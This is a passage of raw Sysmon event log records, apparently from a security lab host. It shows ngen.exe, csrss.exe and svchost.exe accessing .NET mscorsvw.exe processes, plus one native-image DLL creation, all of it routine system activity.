08:07:26.490","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.490\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.490","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.490\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.490","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-0010B1D90F00}","TargetProcessId":"1340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.537\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.537","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:26.772\r\nProcessGuid: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nProcessId: 2992\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb0-0\\WindowsFormsIntegration.dll\r\nCreationUtcTime: 2020-08-01 08:07:26.772","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:26.772","ProcessGuid":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb0-0\\WindowsFormsIntegration.dll","CreationUtcTime":"2020-08-01 08:07:26.772","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.818\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.818","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.818\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.818","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010401D0F00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010401D0F00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 